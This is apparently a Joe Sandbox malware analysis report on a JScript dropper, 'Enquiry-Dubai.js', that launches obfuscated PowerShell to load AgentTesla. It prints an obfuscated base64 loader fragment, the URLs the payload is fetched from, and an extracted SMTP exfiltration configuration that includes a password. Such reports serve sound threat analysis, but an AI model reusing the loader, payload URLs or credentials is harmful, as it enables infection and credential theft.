acksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslanshacksGMslanshacksbwB1slanshacksHIslanshacksc

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-23T21:49:03.955868+010020204251Exploit Kit Activity Detected172.66.0.235443192.168.2.449723TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-23T21:49:04.104187+010020576351A Network Trojan was detected172.66.0.235443192.168.2.449723TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-23T21:49:02.447982+010020490381A Network Trojan was detected207.241.227.224443192.168.2.449716TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-23T21:49:04.104187+010028582951A Network Trojan was detected172.66.0.235443192.168.2.449723TCP

                        Joe Sandbox Signatures

                        • AV Detection
                        • Compliance
                        • Software Vulnerabilities
                        • Networking
                        • Key, Mouse, Clipboard, Microphone and Screen Capturing
                        • System Summary
                        • Data Obfuscation
                        • Hooking and other Techniques for Hiding and Protection
                        • Malware Analysis System Evasion
                        • Anti Debugging
                        • HIPS / PFW / Operating System Protection Evasion
                        • Language, Device and Operating System Detection
                        • Stealing of Sensitive Information
                        • Remote Access Functionality

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 10.2.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.detarcoopmedical.com", "Username": "mail@detarcoopmedical.com", "Password": "To$zL%?nhDHN"}
                        Source: unknownHTTPS traffic detected: 207.241.227.224:443 -> 192.168.2.4:49716 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49719 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.66.0.235:443 -> 192.168.2.4:49723 version: TLS 1.2
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbase source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `2dnlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.
                        Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinst
                        Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp

                        Software Vulnerabilities

                        barindex
                        Source: Enquiry-Dubai.jsArgument value : ['"powershell -NoProfile -Command ""$Codigo = \'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslansha']
                        Source: Enquiry-Dubai.jsArgument value : ['"WScript.Shell"', '"powershell -NoProfile -Command ""$Codigo = \'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslansha']
                        Source: Enquiry-Dubai.jsReturn value : ['"WScript.Shell"', '"powershell -NoProfile -Command ""$Codigo = \'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslansha']
                        Source: Enquiry-Dubai.jsReturn value : ['"WScript.Shell"', '"powershell -NoProfile -Command ""$Codigo = \'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslansha']
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.66.0.235:443 -> 192.168.2.4:49723
                        Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.66.0.235:443 -> 192.168.2.4:49723
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.66.0.235:443 -> 192.168.2.4:49723
                        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 207.241.227.224:443 -> 192.168.2.4:49716
                        Source: global trafficTCP traffic: 192.168.2.4:49725 -> 161.97.124.96:587
                        Source: global trafficHTTP traffic detected: GET /25/items/new_image_20250318/new_image.jpg HTTP/1.1Host: ia600204.us.archive.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /223.txt HTTP/1.1Host: pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.devConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 172.66.0.235 172.66.0.235
                        Source: Joe Sandbox ViewIP Address: 172.66.0.235 172.66.0.235
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: ip-api.com
                        Source: global trafficTCP traffic: 192.168.2.4:49725 -> 161.97.124.96:587
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                        Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /25/items/new_image_20250318/new_image.jpg HTTP/1.1Host: ia600204.us.archive.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /223.txt HTTP/1.1Host: pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.devConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                        Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: ia600204.us.archive.org
                        Source: global trafficDNS traffic detected: DNS query: c.pki.goog
                        Source: global trafficDNS traffic detected: DNS query: pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: mail.detarcoopmedical.com
                        Source: MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detarcoopmedical.com
                        Source: MSBuild.exe, 0000000A.00000002.2482251027.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.detarcoopmedical.com
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1411249717.000001AE01C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev
